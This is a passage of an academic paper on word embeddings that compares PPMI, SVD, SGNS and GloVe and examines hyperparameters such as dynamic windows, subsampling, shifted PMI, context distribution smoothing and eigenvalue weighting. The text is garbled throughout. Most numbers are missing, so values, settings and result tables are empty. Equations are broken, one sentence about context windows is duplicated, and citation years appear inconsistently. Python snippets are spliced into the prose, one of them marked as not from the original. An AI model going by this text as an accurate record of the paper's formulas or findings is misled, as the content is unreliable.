what, then, is the source of superiority (or perceived superiority) of these recent embeddings? while the focus of the presentation in the word-embedding literature is on the mathematical model and the objective being optimized, other factors affect the results as well. in particular, embedding algorithms suggest some natural hyperparameters that can be tuned; many of these were already tuned to some extent by the algorithms' designers. some hyperparameters, such as the number of negative samples to use, are clearly marked as tunable. other modifications, such as smoothing the negative-sampling distribution, are reported in passing and considered thereafter as part of the algorithm. others still, such as dynamically-sized context windows, are not even mentioned in some of the papers, but are part of the canonical implementation.
all of these modifications and system design choices, which we collectively denote as hyperparameters, are part of the final algorithm, and, as we show, have a substantial impact on performance. in this work, we make these hyperparameters explicit, and show how they can be adapted and transferred into the traditional count-based approach. to assess how each hyperparameter contributes to the algorithms' performance, we conduct a comprehensive set of experiments and compare four different representation methods, while controlling for the various hyperparameters.

once adapted across methods, hyperparameter tuning significantly improves performance in every task. in many cases, changing the setting of a single hyperparameter yields a greater increase in performance than switching to a better algorithm or training on a larger corpus. in particular, word2vec's smoothing of the negative sampling distribution can be adapted to ppmi-based methods by introducing a novel, smoothed variant of the pmi association measure (see section . ). using this variant increases performance by over points per task, on average. we suspect that this smoothing partially addresses the "achilles' heel" of pmi: its bias towards co-occurrences of rare words. we also show that when all methods are allowed to tune a similar set of hyperparameters, their performance is largely comparable. in fact, there is no consistent advantage to one algorithmic approach over another, a result that contradicts the claim that embeddings are superior to count-based methods.

background

we consider four word representation methods: the explicit ppmi matrix, svd factorization of said matrix, sgns, and glove. for historical reasons, we refer to ppmi and svd as "count-based" representations, as opposed to sgns and glove, which are often referred to as "neural" or "prediction-based" embeddings. all of these methods (as well as all other "skip-gram"-based embedding methods) are essentially bag-of-words models, in which the representation of each word reflects a weighted bag of context-words that co-occur with it. such bag-of-word embedding models were previously shown to perform as well as or better than more complex embedding methods on similarity and analogy tasks (mikolov et al., a; pennington et al., ).

notation

we assume a collection of words w ∈ V_W and their contexts c ∈ V_C, where V_W and V_C are the word and context vocabularies, and denote the collection of observed word-context pairs as D. we use #(w,c) to denote the number of times the pair (w,c) appears in D. similarly, #(w) = Σ_{c'∈V_C} #(w,c') and #(c) = Σ_{w'∈V_W} #(w',c) are the number of times w and c occurred in D, respectively. in some algorithms, words and contexts are embedded in a space of d dimensions. in these cases, each word w ∈ V_W is associated with a vector w⃗ ∈ R^d and similarly each context c ∈ V_C is represented as a vector c⃗ ∈ R^d. we sometimes refer to the vectors w⃗ as rows in a |V_W| × d matrix W, and to the vectors c⃗ as rows in a |V_C| × d matrix C. when referring to embeddings produced by a specific method x, we may use W^x and C^x (e.g. W^SGNS or C^SVD). all vectors are normalized to unit length before they are used for similarity calculation, making cosine similarity and dot-product equivalent (see section . for further discussion).

contexts

D is commonly obtained by taking a corpus w_1, w_2, ..., w_n and defining the contexts of word w_i as the words surrounding it in an L-sized window w_{i−L}, ..., w_{i−1}, w_{i+1}, ..., w_{i+L}. while other definitions of contexts have been studied (padó and lapata, ; baroni and lenci, ; levy and goldberg, a), this work focuses on fixed-window bag-of-words contexts.
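as an illustration of this context definition, the following is a minimal python sketch (not from the original paper) that collects the word-context pair collection D and the counts #(w,c) from a tokenized corpus using a fixed L-sized symmetric window; the toy corpus and window size are placeholder values.

```python
from collections import Counter

def extract_pairs(tokens, window=2):
    """collect word-context pair counts #(w, c) from a fixed-size symmetric window."""
    pairs = Counter()
    for i, word in enumerate(tokens):
        start = max(0, i - window)
        end = min(len(tokens), i + window + 1)
        for j in range(start, end):
            if j != i:
                pairs[(word, tokens[j])] += 1
    return pairs

# toy corpus; in practice this would be a large tokenized text collection
corpus = "the quick brown fox jumps over the lazy dog".split()
pair_counts = extract_pairs(corpus, window=2)  # L = 2

# marginal counts #(w), obtained by summing the pair counts per word
word_counts = Counter()
for (w, _), n in pair_counts.items():
    word_counts[w] += n

print(pair_counts.most_common(5))
print(word_counts)
```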
while other definitions of contexts have been studied (padó and lapata, 2007; baroni and lenci, 2010; levy and goldberg, 2014a), this work focuses on fixed-window bag-of-words contexts.

explicit representations (ppmi matrix)
the traditional way to represent words in the distributional approach is to construct a high-dimensional sparse matrix m, where each row represents a word w in the vocabulary v_w and each column a potential context c ∈ v_c. the value of each matrix cell m_ij represents the association between the word w_i and the context c_j. a popular measure of this association is pointwise mutual information (pmi) (church and hanks, 1990). pmi is defined as the log ratio between w and c's joint probability and the product of their marginal probabilities, which can be estimated by:

pmi(w,c) = log [ p̂(w,c) / (p̂(w) · p̂(c)) ] = log [ (#(w,c) · |d|) / (#(w) · #(c)) ]

the rows of m^pmi contain many entries of word-context pairs (w,c) that were never observed in the corpus, for which pmi(w,c) = log 0 = −∞. a common approach is thus to replace the m^pmi matrix with m^pmi_0, in which pmi(w,c) = 0 in cases where #(w,c) = 0. a more consistent approach is to use positive pmi (ppmi), in which all negative values are replaced by 0:

ppmi(w,c) = max(pmi(w,c), 0)

bullinaria and levy (2007) showed that m^ppmi outperforms m^pmi_0 on semantic similarity tasks. a well-known shortcoming of pmi, which persists in ppmi, is its bias towards infrequent events (turney and pantel, 2010). a rare context c that co-occurred with a target word w even once will often yield a relatively high pmi score because p̂(c), which is in pmi's denominator, is very small. this creates a situation in which the top "distributional features" (contexts) of w are often extremely rare words, which do not necessarily appear in the respective representations of words that are semantically similar to w. nevertheless, the ppmi measure is widely regarded as state-of-the-art for these kinds of distributional-similarity models.

singular value decomposition (svd)
while sparse vector representations work well, there are also advantages to working with dense low-dimensional vectors, such as improved computational efficiency and, arguably, better generalization. such vectors can be obtained by performing dimensionality reduction over the sparse high-dimensional matrix. a common method of doing so is truncated singular value decomposition (svd), which finds the optimal rank-d factorization with respect to l2 loss (eckart and young, 1936). it was popularized in nlp via latent semantic analysis (lsa) (deerwester et al., 1990). svd factorizes m into the product of three matrices u · Σ · v⊤, where u and v are orthonormal and Σ is a diagonal matrix of eigenvalues in decreasing order. by keeping only the top d elements of Σ, we obtain m_d = u_d · Σ_d · v_d⊤. the dot-products between the rows of w = u_d · Σ_d are equal to the dot-products between the rows of m_d. in the setting of word-context matrices, the dense, d-dimensional rows of w can substitute the very high-dimensional rows of m. indeed, a common approach in the nlp literature is factorizing the ppmi matrix m^ppmi with svd, and then taking the rows of

w^svd = u_d · Σ_d        c^svd = v_d

as word and context representations, respectively.

skip-grams with negative sampling (sgns)
we present a brief sketch of sgns – the skip-gram embedding model introduced in mikolov et al. (2013a), trained using the negative-sampling procedure presented in mikolov et al. (2013b). a detailed derivation of sgns is available in goldberg and levy (2014).
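before continuing with sgns, here is a hedged sketch of the ppmi construction and svd factorization just described, assuming the pair counts from the previous sketch; the function names and the choice of d are illustrative and not the authors' code.

```python
import numpy as np
from scipy.sparse import csr_matrix
from scipy.sparse.linalg import svds

def build_ppmi(pair_counts, word_counts, context_counts, words, contexts):
    """Build a sparse PPMI matrix:
       ppmi(w,c) = max(log(#(w,c) * |D| / (#(w) * #(c))), 0)."""
    w_index = {w: i for i, w in enumerate(words)}
    c_index = {c: j for j, c in enumerate(contexts)}
    total = sum(pair_counts.values())          # |D|
    rows, cols, vals = [], [], []
    for (w, c), n in pair_counts.items():
        pmi = np.log(n * total / (word_counts[w] * context_counts[c]))
        if pmi > 0:                            # keep only positive PMI cells
            rows.append(w_index[w]); cols.append(c_index[c]); vals.append(pmi)
    return csr_matrix((vals, (rows, cols)), shape=(len(words), len(contexts)))

def svd_embeddings(ppmi, d=500):
    """Rank-d truncated SVD; returns W = U_d * Sigma_d and C = V_d
    (the traditional factorization, i.e. full eigenvalue weighting)."""
    u, s, vt = svds(ppmi, k=d)                 # svds returns singular values in ascending order
    order = np.argsort(-s)
    u, s, vt = u[:, order], s[order], vt[order]
    return u * s, vt.T                         # word vectors W, context vectors C
```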
sgns seeks to represent each word w ∈ vw and each context c ∈ vc as d-dimensional vec- tors ~w and ~c, such that words that are “similar” to each other will have similar vector representa- tions. it does so by trying to maximize a function of the product ~w ·~c for (w,c) pairs that occur in d, and minimize it for negative examples: (w,cn ) pairs that do not necessarily occur in d. the neg- ative examples are created by stochastically cor- rupting observed (w,c) pairs from d – hence the name “negative sampling”. for each observation of (w,c), sgns draws k contexts from the em- pirical unigram distribution pd(c) = #(c) |d| . in word vec’s implementation of sgns, this dis- tribution is smoothed, a design choice that boosts its performance. we explore this hyperparameter and others in section . sgns as implicit matrix factorization levy and golberg ( c) show that sgns’s corpus- level objective achieves its optimal value when: ~w ·~c = pmi(w,c) − log k hence, sgns is implicitly factorizing a word- context matrix whose cell’s values are pmi, shifted by a global constant (log k): w ·c> = mpmi − log k sgns performs a different kind of factorization from traditional svd (see . ). in particular, the factorization’s loss function is not based on l , and is much less sensitive to extreme and infi- nite values due to a sigmoid function surrounding ~w · ~c. furthermore, the loss is weighted, caus- ing rare (w,c) pairs to affect the objective much less than frequent ones. thus, while many cells in mpmi equal log = −∞, the cost incurred for re- constructing these cells as a small negative value, such as − instead of as −∞, is negligible. the logistic (sigmoidal) objective also curbs very high positive values of pmi. we suspect that this property, along with the weighted factorization property, addresses the afore- mentioned shortcoming of pmi, i.e. its overweighting of in- frequent events. an additional difference from svd, which will be explored further in section . , is that svd factorizes m into three matrices, two of them or- thonormal and one diagonal, while sgns factor- izes m into two unconstrained matrices. . global vectors (glove) glove (pennington et al., ) seeks to represent each word w ∈ vw and each context c ∈ vc as d-dimensional vectors ~w and ~c such that: ~w ·~c + bw + bc = log (#(w,c)) ∀(w,c) ∈ d here, bw and bc (scalars) are word/context-specific biases, and are also parameters to be learned in addition to ~w and ~c. glove’s objective is explicitly defined as a fac- torization of the log-count matrix, shifted by the entire vocabularies’ bias terms: m log(#(w,c)) ≈ w ·c> + ~bw + ~bc where ~bw is a |vw | dimensional row vector and ~bc is a |vc| dimensional column vector. if we were to fix bw = log #(w) and bc = log #(c), this would be almost equivalent to fac- torizing the pmi matrix shifted by log(|d|). how- ever, glove learns these parameters, giving an ex- tra degree of freedom over svd and sgns. the model is fit to minimize a weighted least square loss, giving more weight to frequent (w,c) pairs. finally, an important novelty introduced in (pennington et al., ) is that, assuming vc = vw , one could take the representation of a word w to be ~w + ~cw where ~cw is the row correspond- ing to w in c>. this may improve results con- siderably in some circumstances, as we discuss in sections . and . . transferable hyperparameters this section presents various hyperparameters im- plemented in word vec and glove, and shows how to adapt and apply them to count-based methods. 
we divide these into: pre-processing hyperparameters, which affect the algorithms’ input data; association metric hyperparameters, which define how word-context interactions are calculated; and post-processing hyperparameters, which modify the resulting word vectors. glove’s objective ignores (w, c) pairs that do not co- occur in the training corpus, treating them as missing values. sgns, on the other hand, does take such pairs into account through the negative sampling procedure. the weighting formula is another hyper-parameter that could be tuned, but we keep to the default weighting scheme. . pre-processing hyperparameters all the matrix-based algorithms rely on a col- lection d of word-context pairs (w,c) as inputs. word vec introduces three novel variations on the way d is collected, which can be easily ap- plied to other methods beyond sgns. dynamic context window (dyn) the tradi- tional approaches usually use a constant-sized un- weighted context window. for instance, if the win- dow size is , then a word five tokens apart from the target is treated the same as an adjacent word. following the intuition that contexts closer to the target are more important, context words can be weighted according to their distance from the fo- cus word. both glove and word vec employ such a weighting scheme, and while less com- mon, this approach was also explored in tradi- tional count-based methods, e.g. (sahlgren, ). glove’s implementation weights contexts using the harmonic function, e.g. a context word three tokens away will be counted as of an occurrence. on the other hand, word vec’s implementation is equivalent to weighing by the distance from the focus word divided by the window size. for ex- ample, a size- window will weigh its contexts by , , , , . the reason we call this modification dynamic context windows is because word vec imple- ments its weighting scheme by uniformly sam- pling the actual window size between and l, for each token (mikolov et al., a). the sampling method is faster than the direct method in terms of training time, since there are fewer sgd updates in sgns and fewer non-zero matrix cells in the other methods. for our systematic experiments, we used the word vec-style sampled version for all methods, including glove. subsampling (sub) subsampling is a method of diluting very frequent words, akin to removing stop-words. the subsampling method presented in (mikolov et al., a) randomly removes words that are more frequent than some threshold t with a probability of p, where f marks the word’s corpus frequency: p = − √ t f ( ) following the recommendation in (mikolov et al., a), we use t = − in our experiments. word vec’s code implements a slightly different for- mula: p = f−t f − √ t f . we followed the formula presented another implementation detail of subsampling in word vec is that the removal of tokens is done before the corpus is processed into word- context pairs. this practically enlarges the con- text window’s size for many tokens, because they can now reach words that were not in their origi- nal l-sized windows. we call this kind of subsam- pling “dirty”, as opposed to “clean” subsampling, which removes subsampled words without affect- ing the context window’s size. we found their im- pact on performance comparable, and report re- sults of only the “dirty” variant. deleting rare words (del) while it is com- mon to ignore words that are rare in the training corpus, word vec removes these tokens from the corpus before creating context windows. 
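the dyn and sub variations above translate directly into code; the following minimal sketch (our naming; the threshold t = 1e-5 follows the recommendation cited above) shows word2vec-style window-size sampling and "dirty" subsampling applied to the raw token stream. the del variation, whose discussion continues below, simply removes rare tokens from the corpus before this step.

```python
import math
import random

def dynamic_window(max_window):
    """word2vec-style dynamic window: sample the actual size uniformly from 1..L."""
    return random.randint(1, max_window)

def subsample(tokens, counts, total, t=1e-5):
    """'Dirty' subsampling: frequent tokens are removed before context windows are
    built, with probability p = 1 - sqrt(t / f), where f is the corpus frequency."""
    kept = []
    for w in tokens:
        f = counts[w] / total
        p_remove = 1.0 - math.sqrt(t / f) if f > t else 0.0
        if random.random() >= p_remove:
            kept.append(w)
    return kept
```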
as with subsampling, this variation narrows the dis- tance between tokens, inserting new word-context pairs that did not exist in the original corpus with the same window size. though this variation may also have an effect on performance, preliminary experiments showed that it was small, and we therefore do not investigate its effect in this paper. . association metric hyperparameters the pmi (or ppmi) between a word and its con- text is well known to be an effective association measure in the word similarity literature. levy and golberg ( c) show that sgns is implicitly fac- torizing a word-context matrix whose cell’s val- ues are shifted pmi. following their analysis, we present two variations of the pmi (and implicitly ppmi) association metric, which we adopt from sgns. these enhancements of pmi are not di- rectly applicable to glove, which, by definition, uses a different association measure. shifted pmi (neg) sgns has a natural hyper- parameter k (the number of negative samples), which affects the value that sgns is trying to op- timize for each (w,c): pmi(w,c) − log k. the shift caused by k > can be applied to distri- butional methods through shifted ppmi (levy and goldberg, c): sppmi(w,c) = max (pmi (w,c) − log k, ) it is important to understand that in sgns, k has two distinct functions. first, it is used to better estimate the distribution of negative examples; a higher k means more data and better estimation. in the original paper (equation ). second, it acts as a prior on the probability of ob- serving a positive example (an actual occurrence of (w,c) in the corpus) versus a negative example; a higher k means that negative examples are more probable. shifted ppmi captures only the second aspect of k (a prior). we experiment with three values of k: , , . context distribution smoothing (cds) in word vec, negative examples (contexts) are sampled according to a smoothed unigram dis- tribution. in order to smooth the original con- texts’ distribution, all context counts are raised to the power of α (mikolov et al. ( b) found α = . to work well). this smoothing varia- tion has an analog when calculating pmi directly: pmiα (w,c) = log p̂(w,c) p̂(w)p̂α(c) ( ) p̂α(c) = # (c) α∑ c # (c) α like other smoothing techniques (pantel and lin, ; turney and littman, ), context distri- bution smoothing alleviates pmi’s bias towards rare words. it does so by enlarging the probability of sampling a rare context (since p̂α(c) > p̂(c) when c is infrequent), which in turn reduces the pmi of (w,c) for any w co-occurring with the rare context c. in section . we demonstrate that this novel variant of pmi is very effective, and consis- tently improves performance across tasks, meth- ods, and configurations. we experiment with two values of α: (unsmoothed) and . (smoothed). . post-processing hyperparameters we present three hyperparameters that modify the algorithms’ output: the word vectors. adding context vectors (w+c) pennington et al. ( ) propose using the context vectors in ad- dition to the word vectors as glove’s output. for example, the word “cat” can be represented as: ~vcat = ~wcat + ~ccat where ~w and ~c are the word and context embed- dings, respectively. this vector combination was originally moti- vated as an ensemble method. here, we provide a different interpretation of its effect on the co- sine similarity function. specifically, we show that adding context vectors effectively adds first- order similarity terms to the second-order similar- ity function. 
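returning briefly to the association-metric hyperparameters before completing the w+c analysis: shifted ppmi and context distribution smoothing combine naturally, as in the following sketch (names are ours; the defaults k = 5 and α = 0.75 are among the values explored in this work).

```python
import numpy as np

def sppmi_cds(n_wc, n_w, n_c_alpha, total, total_alpha, k=5, alpha=0.75):
    """Shifted PPMI with context distribution smoothing:
       pmi_alpha(w,c) = log( p(w,c) / (p(w) * p_alpha(c)) )
       sppmi(w,c)     = max(pmi_alpha(w,c) - log(k), 0)
    where n_c_alpha = #(c)**alpha and total_alpha = sum over contexts of #(c)**alpha."""
    p_wc = n_wc / total
    p_w = n_w / total
    p_c_smoothed = n_c_alpha / total_alpha
    pmi = np.log(p_wc / (p_w * p_c_smoothed))
    return max(pmi - np.log(k), 0.0)
```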
consider the cosine similarity of two words: cos(x,y) = ~vx ·~vy√ ~vx ·~vx √ ~vy ·~vy = (~wx + ~cx) · (~wy + ~cy)√ (~wx + ~cx) · (~wx + ~cx) √ (~wy + ~cy) · (~wy + ~cy) = ~wx · ~wy + ~cx ·~cy + ~wx ·~cy + ~cx · ~wy√ ~w x + ~wx ·~cx + ~c x √ ~w y + ~wy ·~cy + ~c y = ~wx · ~wy + ~cx ·~cy + ~wx ·~cy + ~cx · ~wy √ ~wx ·~cx + √ ~wy ·~cy + ( ) (the last step follows because, as noted in sec- tion , the word and context vectors are normal- ized after training.) the resulting expression combines similarity terms which can be divided into two groups: second-order similarity (wx ·wy, cx ·cy) and first- order similarity (w∗ · c∗). the second-order terms measure the extent to which the two words are re- placeable based on their tendencies to appear in similar contexts, and are the manifestation of har- ris’s ( ) distributional hypothesis. the first- order terms measure the tendency of one word to appear in the context of the other. in svd and sgns, the first-order similarity terms between w and c converge to pmi(w,c), while in glove it converges into their log-count (with some bias terms). the similarity calculated in equation is thus a symmetric combination of the first-order and sec- ond order similarities of x and y, normalized by a function of their reflective first-order similarities: sim(x,y) = sim (x,y) + sim (x,y)√ sim (x,x) + √ sim (y,y) + this similarity measure states that words are similar if they tend to appear in similar contexts, or if they tend to appear in the contexts of each other (and preferably both). the additive w+c representation can be triv- ially applied to other methods that produce distinct word and context vectors (e.g. svd and sgns). on the other hand, explicit methods such as ppmi are sparse by definition, and nullify the vast ma- jority of first-order similarities. we therefore do not apply w+c to ppmi in this study. eigenvalue weighting (eig) as mentioned in section . , the word and context vectors derived using svd are typically represented by (equa- tion ): w svd = ud · Σd csvd = vd however, this is not necessarily the optimal con- struction of w svd for word similarity tasks. we note that in the svd-based factorization, the re- sulting word and context matrices have very dif- ferent properties. in particular, the context ma- trix csvd is orthonormal while the word matrix w svd is not. on the other hand, the factorization achieved by sgns’s training procedure is much more “symmetric”, in the sense that neither w w v nor cw v is orthonormal, and no particular bias is given to either of the matrices in the training ob- jective. similar symmetry can be achieved with the following factorization: w = ud · √ Σd c = vd · √ Σd ( ) alternatively, the eigenvalue matrix can be dis- missed altogether: w = ud c = vd ( ) while it is not theoretically clear why the symmetric approach is better for semantic tasks, it does work much better empirically (see sec- tion . ). a similar observation was made by caron ( ), who suggested adding a parameter p to control the eigenvalue matrix Σ: w svdp = ud · Σ p d later studies show that weighting the eigenvalue matrix Σd with the exponent p can have a signif- icant effect on performance, and should be tuned (bullinaria and levy, ; turney, ). adapt- ing the notion of symmetric decomposition from sgns, this study experiments only with symmet- ric variants of svd (p = , p = . ; equations ( ) and ( )) and the traditional factorization (p = ; equation ( )). vector normalization (nrm) as mentioned in section , all vectors (i.e. 
w ’s rows) are normal- ized to unit length (l normalization), rendering the dot product operation equivalent to cosine sim- ilarity. this normalization is a hyperparameter set- ting in itself, and other normalizations are also ap- plicable. the trivial case is using no normalization hyper- explored applicable parameter values methods win , , all dyn none, with all sub none, dirty, clean† all del none, with† all neg , , ppmi, svd, sgns cds , . ppmi, svd, sgns w+c only w, w + c svd, sgns, glove eig , . , svd nrm none†, row, col†, both† all table : the space of hyperparameters explored in this work. †explored only in preliminary experiments. at all. another setting, used by pennington et al. ( ), normalizes the columns of w rather than its rows. it is also possible to consider a fourth setting that combines both row and column nor- malizations. note that column normalization is akin to dis- missing the eigenvalues in svd. while the hy- perparameter setting eig = has an important positive impact on svd, the same cannot be said of column normalization on other methods. in preliminary experiments, we tried the four differ- ent normalization schemes described above (none, row, column, and both), and found the standard l normalization of w ’s rows (i.e. using the cosine similarity measure) to be consistently superior. experimental setup we explored a large space of hyperparameters, representations, and evaluation datasets. . hyperparameter space table enumerates the hyperparameter space. we generated ppmi, svd, sgns, and glove representations; overall. . word representations corpus all models were trained on english wikipedia (august dump), pre-processed by removing non-textual elements, sentence splitting, and tokenization. the corpus contains . mil- lion sentences, spanning . billion tokens. mod- els were derived using windows of , , and tokens to each side of the focus word (the window size parameter is denoted win). words that ap- peared less than times in the corpus were ig- nored, resulting in vocabularies of , terms for both words and contexts. training embeddings we trained a - dimensional representation with svd, sgns, and glove. sgns was trained using a modified ver- sion of word vec which receives a sequence of pre-extracted word-context pairs (levy and gold- berg, a). glove was trained with itera- tions using the original implementation (penning- ton et al., ), applied to the pre-extracted word- context pairs. . test datasets we evaluated each word representation on eight datasets covering similarity and analogy tasks. word similarity we used six datasets to eval- uate word similarity: the popular wordsim (finkelstein et al., ) partitioned into two datasets, wordsim similarity and wordsim relat- edness (zesch et al., ; agirre et al., ); bruni et al.’s ( ) men dataset; radinsky et al.’s ( ) mechanical turk dataset; luong et al.’s ( ) rare words dataset; and hill et al.’s ( ) simlex- dataset. all these datasets con- tain word pairs together with human-assigned sim- ilarity scores. the word vectors are evaluated by ranking the pairs according to their cosine similar- ities, and measuring the correlation (spearman’s ρ) with the human ratings. analogy the two analogy datasets present ques- tions of the form “a is to a∗ as b is to b∗”, where b∗ is hidden, and must be guessed from the entire vocabulary. msr’s analogy dataset (mikolov et al., c) contains morpho-syntactic anal- ogy questions, such as “good is to best as smart is to smartest”. 
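the word-similarity evaluation protocol described above (rank the pairs by cosine similarity, then correlate with the human ratings using spearman's ρ) can be sketched as follows; the embedding lookup and dataset format are assumptions on our part.

```python
import numpy as np
from scipy.stats import spearmanr

def evaluate_similarity(pairs, human_scores, embeddings):
    """pairs: list of (w1, w2); human_scores: matching list of human ratings;
    embeddings: dict mapping words to L2-normalized vectors, so the dot
    product equals cosine similarity."""
    model_scores, gold = [], []
    for (w1, w2), score in zip(pairs, human_scores):
        if w1 in embeddings and w2 in embeddings:   # skip out-of-vocabulary pairs
            model_scores.append(float(np.dot(embeddings[w1], embeddings[w2])))
            gold.append(score)
    rho, _ = spearmanr(model_scores, gold)
    return rho
```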
google’s analogy dataset (mikolov et al., a) contains questions, about half of the same kind as in msr (syntactic analogies), and another half of a more semantic nature, such as capital cities (“paris is to france as tokyo is to japan”). after filtering questions involving out- of-vocabulary words, i.e. words that appeared in english wikipedia less than times, we remain with instances in msr and instances in google. the analogy questions are answered using cosadd (addition and subtraction): arg max b∗∈vw\{a∗,b,a} cos(b∗,a∗ −a + b) = arg max b∗∈vw\{a∗,b,a} (cos(b∗,a∗) − cos(b∗,a) + cos(b∗,b)) as well as cosmul, which is state-of-the-art in analogy recovery (levy and goldberg, b): arg max b∗∈vw\{a∗,b,a} cos(b∗,a∗) · cos(b∗,b) cos(b∗,a) + ε method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex add / mul add / mul ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . table : performance of each method across different tasks in the “vanilla” scenario (all hyperparameters set to default): win = ; dyn = none; sub = none; neg = ; cds = ; w+c = only w; eig = . . method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex add / mul add / mul ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . cbow . . . . . . . / . . / . table : performance of each method across different tasks using word vec’s recommended configuration: win = ; dyn = with; sub = dirty; neg = ; cds = . ; w+c = only w; eig = . . cbow is presented for comparison. method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex add / mul add / mul ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . table : performance of each method across different tasks using the best configuration for that method and task combination, assuming win = . ε = . is used to prevent division by zero. we abbreviate the two methods “add” and “mul”, re- spectively. the evaluation metric for the analogy questions is the percentage of questions for which the argmax result was the correct answer (b∗). results we begin by comparing the effect of various hy- perparameter configurations, and observe that dif- ferent settings have a substantial impact on per- formance (section . ); at times, this improve- ment is greater than that of switching to a dif- ferent representation method. we then show that, in some tasks, careful hyperparameter tuning can also outweigh the importance of adding more data ( . ). finally, we observe that our results do not agree with a few recent claims in the word embed- ding literature, and suggest that these discrepan- cies stem from hyperparameter settings that were not controlled for in previous experiments ( . ). . hyperparameters vs algorithms we first examine a “vanilla” scenario (table ), in which all hyperparameters are “turned off” (set to default values): small context windows (win = ), no dynamic contexts (dyn = none), no sub- sampling (sub = none), one negative sample (neg = ), no smoothing (cds = ), no context vectors (w+c = only w), and default eigenvalue weights (eig = . ). 
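the cosadd and cosmul rules defined above reduce to simple vector arithmetic once the vectors are unit-normalized; a sketch of both (our naming; the ε default is a small constant of the kind used to prevent division by zero, and the cosine-shifting sometimes applied before multiplication is omitted here).

```python
import numpy as np

def answer_analogy(a, a_star, b, W, vocab, method="mul", eps=0.001):
    """W: |V| x d matrix of L2-normalized word vectors; vocab: words in row order.
    Returns the argmax candidate b* for 'a is to a* as b is to ?'."""
    idx = {w: i for i, w in enumerate(vocab)}
    cos_a  = W @ W[idx[a]]        # cos(b*, a) for every candidate b*
    cos_as = W @ W[idx[a_star]]   # cos(b*, a*)
    cos_b  = W @ W[idx[b]]        # cos(b*, b)
    if method == "add":           # cosadd: cos(b*,a*) - cos(b*,a) + cos(b*,b)
        scores = cos_as - cos_a + cos_b
    else:                         # cosmul: cos(b*,a*) * cos(b*,b) / (cos(b*,a) + eps)
        scores = (cos_as * cos_b) / (cos_a + eps)
    for w in (a, a_star, b):      # exclude the question words themselves
        scores[idx[w]] = -np.inf
    return vocab[int(np.argmax(scores))]
```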
overall, svd outperforms other methods on most word similarity tasks, often having a considerable advantage over the second- best. in contrast, analogy tasks present mixed re- sults; sgns yields the best result in msr’s analo- gies, while ppmi dominates google’s dataset. the second scenario (table ) sets the hyper- parameters to word vec’s default values: small context windows (win = ), dynamic contexts (dyn = with), dirty subsampling (sub = dirty), five negative samples (neg = ), context distribu- tion smoothing (cds = . ), no context vectors (w+c = only w), and default eigenvalue weights while it is more common to set eig = , this setting degrades svd’s performance considerably (see section . ). while word vec’s default window size is , we present a single window size (win = ) in tables - , in order to iso- late win’s effect from the effects of other hyperparameters. running the same experiments with different window sizes reveals similar trends. additional results with broader win- dow sizes are shown in table . win method wordsim wordsim bruni et al. radinsky et al. luong et al. hill et al. google msr similarity relatedness men m. turk rare words simlex add / mul add / mul ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . ppmi . . . . . . . / . . / . svd . . . . . . . / . . / . sgns . . . . . . . / . . / . glove . . . . . . . / . . / . sgns-ls . . . . . . . / . . / . glove-ls . . . . . . . / . . / . table : performance of each method across different tasks using -fold cross-validation for hyperparameter tuning. configu- rations on large-scale (ls) corpora are also presented for comparison. (eig = . ). the results in this scenario are quite different than those of the vanilla scenario, with better performance in many cases. however, this change is not uniform, as we observe that differ- ent settings boost different algorithms. in fact, the question “which method is best?” might have a completely different answer when comparing on the same task but with different hyperparameter values. looking at table and table , for ex- ample, svd is the best algorithm for simlex- in the vanilla scenario, whereas in the word vec scenario, it does not perform as well as sgns. the third scenario (table ) enables the full range of hyperparameters given small context win- dows (win = ); we evaluate each method on each task given every hyperparameter configura- tion, and choose the best performance. we see a considerable performance increase across all methods when comparing to both the vanilla (ta- ble ) and word vec scenarios (table ): the best combination of hyperparameters improves up to . points beyond the vanilla setting, and over points on average. it appears that selecting the right hyperparameter settings often has more im- pact than choosing the most suitable algorithm. main result the numbers in table result from an “oracle” experiment, in which the hyperparam- eters are tuned on the test data, providing an upper bound on the potential performance improvement of hyperparameter tuning. are such gains achiev- able in practice? table describes a realistic scenario, where the hyperparameters are tuned on a training set, which is separate from the unseen test data. we also report results for different window sizes (win = , , ). 
we use -fold cross validation, in which, for each task, the hyperparameters are tuned on each half of the data and evaluated on the other half. the numbers reported in table are the av- erages of the two runs for each data-point. the results indicate that approaching the ora- cle’s improvements are indeed feasible. when comparing the performance of the trained config- uration (table ) to that of the optimal one (ta- ble ), their average difference is about %, with larger datasets usually finding the optimal configu- ration. it is therefore both practical and beneficial to properly tune hyperparameters for word simi- larity and analogy detection tasks. an interesting observation, which immediately appears when looking at table , is that there is no single method that consistently performs better than the rest. this behavior is visible across all window sizes, and is discussed in further detail in section . . . hyperparameters vs big data an important factor in evaluating distributional methods is the size of corpus and vocabulary, where larger corpora tend to yield better repre- sentations. however, training word vectors from larger corpora is more costly in computation time, which could be spent in tuning hyperparameters. to compare the effect of bigger data versus more flexible hyperparameter settings, we created a large corpus with over . billion words ( times larger than our original corpus). this cor- pus was built from an . billion word corpus sug- gested by mikolov for training word vec, to which we added ukwac (ferraresi et al., ). as with the original setup, our vocabulary con- tained every word that appeared at least times in the corpus, amounting to about , words. finally, we fixed the context windows to be broad and dynamic (win = ,dyn = with), and ex- plored hyperparameter settings comprising of: subsampling (sub), shifted pmi (neg = , ), context distribution smoothing (cds), and adding context vectors (w+c). this space is somewhat more restricted than the original hyperparameter space. in terms of computation, sgns scales nicely, requiring about half a day of computation per setup. glove, on the other hand, took several days to run a single -iteration instance for this corpus. applying the traditional count-based methods to this setting proved technically challenging, as they consumed too much memory to be efficiently ma- nipulated. we thus present results for only sgns and glove (table ). remarkably, there are some cases ( / word similarity tasks) in which tuning a larger space of hyperparameters is indeed more beneficial than expanding the corpus. in other cases, however, more data does seem to pay off, as evident with both analogy tasks. . re-evaluating prior claims prior art raises several claims regarding the superi- ority of certain methods over the others. however, these studies did not control for the hyperparame- ters presented in this work. we thus revisit these claims, and examine 